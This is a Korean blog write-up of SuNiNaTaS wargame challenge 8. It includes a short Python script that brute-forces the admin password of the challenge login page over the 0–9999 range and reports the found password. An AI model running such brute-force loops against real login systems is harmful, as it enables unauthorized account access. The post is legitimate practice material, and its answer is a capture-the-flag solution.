써나니타스 문제 8번

2023. 10. 22. 13:31· 카테고리 없음

오늘은 8번째 문제를 풀어볼 겁니다

페이지 소스 먼저 보겠습니다.

 

 

힌트를 보니 아이디는 admin이고 비밀번호는 0부터 9999까지 사이라고 합니다.

 

브루트포스를 하면 플래그를 얻을 수 있을 것 같아 파이썬 코드를 짜봤습니다.

 

from tqdm import tqdm
from requests import post


for i in tqdm(range(0, 9999 + 1)):
    posts = {
        'id': 'admin',
        'pw': i
    }
    attack = post('http://suninatas.com/challenge/web08/web08.asp',data=posts)
    if "Password Incorrect!" not in attack.text:
        print(f"password is {i}")
        break

이것을 실행하면 이렇게 나옵니다.

너무 오래걸려서 양을 좀 줄였습니다.

이렇게 패스워드가 나오고 admin과 7707을 입력하면 플래그 값이 나오는 것을 볼 수 있습니다.

Hyomo IT
Hyomo IT
초보 개발자 효모입니다.
Hyomo IT
효모의 IT 블로그
Hyomo IT
전체
오늘
어제
  • 분류 전체보기 (11)
    • 모의해킹 (1)
    • PHP (1)
    • 웹해킹 (2)
    • Python (1)

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 백도어
  • dvwa
  • hacking
  • 모의해킹
  • 효모
  • 메타스플로잇
  • 써나니타스
  • 파이썬
  • php
  • searchsploit
  • 해킹
  • Dictionary Attack

최근 댓글

최근 글

hELLO · Designed By 정상우.v4.2.0
Hyomo IT
써나니타스 문제 8번
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.